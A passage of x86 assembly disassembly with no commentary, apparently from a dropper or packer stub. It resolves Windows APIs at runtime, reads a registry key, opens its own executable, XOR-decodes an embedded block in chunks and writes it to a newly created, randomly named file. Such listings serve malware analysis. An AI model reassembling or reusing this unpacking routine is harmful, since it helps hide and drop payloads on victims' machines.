pop ebx
mov esp, ebp
pop ebp
retn
sub_311111A4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31111244 proc near ; CODE XREF: sub_311111A4+31�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov eax, [ebp+arg_4]
mov ebx, [ebp+arg_0]
mov edi, [ebp+arg_8]
mov edx, [eax+20h]
mov ecx, [edx]
mov [ebx], ecx
mov eax, [ebp+arg_4]
mov edx, [eax+20h]
add edx, 4
mov ecx, [edx]
mov [ebx+4], ecx
push edi
call dword ptr [ebx]
mov esi, eax
test esi, esi
jz loc_31111301
mov eax, [ebp+arg_4]
push dword ptr [eax+24h]
push esi
call dword ptr [ebx+4]
mov edx, [ebp+arg_4]
mov ecx, [edx+20h]
mov [ecx], eax
mov eax, [ebp+arg_4]
push dword ptr [eax+28h]
push esi
call dword ptr [ebx+4]
mov edx, [ebp+arg_4]
mov ecx, [edx+20h]
add ecx, 4
mov [ecx], eax
lea eax, [edi+0Dh]
push eax
push esi
call dword ptr [ebx+4]
mov [ebx+8], eax
lea edx, [edi+1Ah]
push edx
push esi
call dword ptr [ebx+4]
mov [ebx+0Ch], eax
lea ecx, [edi+2Bh]
push ecx
push esi
call dword ptr [ebx+4]
mov [ebx+10h], eax
lea eax, [edi+37h]
push eax
push esi
call dword ptr [ebx+4]
mov [ebx+14h], eax
lea edx, [edi+40h]
push edx
push esi
call dword ptr [ebx+4]
mov [ebx+18h], eax
lea ecx, [edi+4Ah]
push ecx
push esi
call dword ptr [ebx+4]
mov [ebx+1Ch], eax
lea eax, [edi+59h]
push eax
push esi
call dword ptr [ebx+4]
mov [ebx+20h], eax
lea edx, [edi+65h]
push edx
push esi
call dword ptr [ebx+4]
mov [ebx+24h], eax
lea ecx, [edi+72h]
push ecx
push esi
call dword ptr [ebx+4]
mov [ebx+28h], eax
jmp short loc_31111305
; ---------------------------------------------------------------------------
loc_31111301: ; CODE XREF: sub_31111244+2B�j
xor eax, eax
jmp short loc_31111346
; ---------------------------------------------------------------------------
loc_31111305: ; CODE XREF: sub_31111244+BB�j
lea edx, [edi+85h]
push edx
call dword ptr [ebx]
mov esi, eax
test esi, esi
jz short loc_31111340
lea eax, [edi+92h]
push eax
push esi
call dword ptr [ebx+4]
mov [ebx+2Ch], eax
lea edx, [edi+0A0h]
push edx
push esi
call dword ptr [ebx+4]
mov [ebx+30h], eax
add edi, 0B1h
push edi
push esi
call dword ptr [ebx+4]
mov [ebx+34h], eax
jmp short loc_31111344
; ---------------------------------------------------------------------------
loc_31111340: ; CODE XREF: sub_31111244+CE�j
xor eax, eax
jmp short loc_31111346
; ---------------------------------------------------------------------------
loc_31111344: ; CODE XREF: sub_31111244+FA�j
mov al, 1
loc_31111346: ; CODE XREF: sub_31111244+BF�j
; sub_31111244+FE�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_31111244 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31111350 proc near ; CODE XREF: sub_311111A4+46�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
lea eax, [ebp+var_4]
push ebx
push esi
push edi
xor ebx, ebx
mov edi, [ebp+arg_8]
mov esi, [ebp+arg_4]
mov [ebp+var_8], 106h
push eax
push 20019h
lea edx, [edi+0BDh]
push 0
push edx
push 80000001h
call dword ptr [esi+2Ch]
test eax, eax
jnz short loc_311113AC
lea ecx, [ebp+var_8]
add edi, 0F0h
push ecx
push [ebp+arg_0]
push 0
push 0
push edi
push [ebp+var_4]
call dword ptr [esi+30h]
test eax, eax
setz bl
and ebx, 1
push [ebp+var_4]
call dword ptr [esi+34h]
loc_311113AC: ; CODE XREF: sub_31111350+34�j
mov eax, ebx
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_31111350 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311113B8 proc near ; CODE XREF: sub_311111A4+66�p
; sub_311111A4+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push [ebp+arg_0]
call dword ptr [ebx]
test eax, eax
jz short loc_311113E7
mov edx, [ebp+arg_C]
add edx, 0F5h
push edx
push eax
call dword ptr [ebx+4]
test eax, eax
jz short loc_311113E7
push [ebp+arg_8]
call eax
test al, al
jz short loc_311113E7
mov al, 1
jmp short loc_311113E9
; ---------------------------------------------------------------------------
loc_311113E7: ; CODE XREF: sub_311113B8+E�j
; sub_311113B8+20�j ...
xor eax, eax
loc_311113E9: ; CODE XREF: sub_311113B8+2D�j
pop ebx
pop ebp
retn 10h
sub_311113B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311113F0 proc near ; CODE XREF: sub_311111A4+7D�p
var_2914 = byte ptr -2914h
var_114 = byte ptr -114h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push eax
mov eax, 2
loc_311113F9: ; CODE XREF: sub_311113F0+11�j
add esp, 0FFFFF004h
push eax
dec eax
jnz short loc_311113F9
mov eax, [ebp+var_4]
add esp, 0FFFFF6F0h
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_114]
push eax
push 0
call dword ptr [ebx+28h]
push 0
push 1
push 3
push 0
push 1
lea edx, [ebp+var_114]
push 80000000h
push edx
call dword ptr [ebx+10h]
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_31111579
lea eax, [ebp+var_114]
push eax
push 104h
call dword ptr [ebx+8]
call dword ptr [ebx+24h]
mov [ebp+var_8], eax
xor ecx, ecx
loc_31111461: ; CODE XREF: sub_311113F0+8B�j
xor eax, eax
mov al, byte ptr [ebp+ecx+var_8]
push ecx
mov ecx, 0Ah
cdq
idiv ecx
pop ecx
add al, 61h
mov byte ptr [ebp+ecx+var_8], al
inc ecx
cmp ecx, 2
jle short loc_31111461
mov byte ptr [ebp+var_8+3], 0
push esi
push 0
lea ecx, [ebp+var_8]
push ecx
lea eax, [ebp+var_114]
push eax
call dword ptr [ebx+0Ch]
push 0
push 80h
push 2
push 0
push 1
push 0C0000000h
push esi
call dword ptr [ebx+10h]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jz loc_3111156F
mov edx, [ebp+arg_8]
mov esi, [edx+18h]
push 0
push 0
mov eax, [ebp+arg_8]
push dword ptr [eax+14h]
push edi
call dword ptr [ebx+1Ch]
cmp esi, 2800h
jbe short loc_31111527
loc_311114D1: ; CODE XREF: sub_311113F0+135�j
push 0
lea edx, [ebp+var_10]
push edx
push 2800h
lea ecx, [ebp+var_2914]
push ecx
push edi
call dword ptr [ebx+14h]
push 2800h
lea eax, [ebp+var_2914]
push eax
mov edx, [ebp+arg_8]
push dword ptr [edx+80h]
call sub_3111158C
lea ecx, [ebp+var_10]
push 0
push ecx
lea eax, [ebp+var_2914]
push 2800h
push eax
push [ebp+var_C]
call dword ptr [ebx+18h]
sub esi, 2800h
cmp esi, 2800h
ja short loc_311114D1
loc_31111527: ; CODE XREF: sub_311113F0+DF�j
push 0
lea edx, [ebp+var_10]
push edx
push esi
lea ecx, [ebp+var_2914]
push ecx
push edi
call dword ptr [ebx+14h]
push esi
lea eax, [ebp+var_2914]
push eax
mov edx, [ebp+arg_8]
push dword ptr [edx+80h]
call sub_3111158C
push 0
lea ecx, [ebp+var_10]
push ecx
push esi
lea eax, [ebp+var_2914]
push eax
push [ebp+var_C]
call dword ptr [ebx+18h]
push [ebp+var_C]
call dword ptr [ebx+20h]
mov byte ptr [ebp+var_4+3], 1
jmp short loc_31111573
; ---------------------------------------------------------------------------
loc_3111156F: ; CODE XREF: sub_311113F0+BF�j
mov byte ptr [ebp+var_4+3], 0
loc_31111573: ; CODE XREF: sub_311113F0+17D�j
push edi
call dword ptr [ebx+20h]
jmp short loc_3111157D
; ---------------------------------------------------------------------------
loc_31111579: ; CODE XREF: sub_311113F0+54�j
mov byte ptr [ebp+var_4+3], 0
loc_3111157D: ; CODE XREF: sub_311113F0+187�j
mov al, byte ptr [ebp+var_4+3]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_311113F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3111158C proc near ; CODE XREF: sub_311113F0+10C�p
; sub_311113F0+15A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
test ecx, ecx
jns short loc_311115A0
add ecx, 3
loc_311115A0: ; CODE XREF: sub_3111158C+F�j
sar ecx, 2
xor eax, eax
cmp ecx, eax
jle short loc_311115B1
loc_311115A9: ; CODE XREF: sub_3111158C+23�j
xor [edx+eax*4], ebx
inc eax
cmp ecx, eax
jg short loc_311115A9
loc_311115B1: ; CODE XREF: sub_3111158C+1B�j
pop ebx
pop ebp
retn 0Ch
sub_3111158C endp
; ---------------------------------------------------------------------------
align 4
dd 6F4C0056h, 694C6461h, 72617262h, 4179h, 74654700h, 636F7250h
dd 72646441h, 737365h, 6188Eh, 5642C1h, 5942C7h, 56BD3Ch
dd 56427Bh, 5642C3h, 4C4283h, 3 dup(5642C3h), 280h dup(0)
_vsp_ ends
; Section 5. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00012000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31112000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start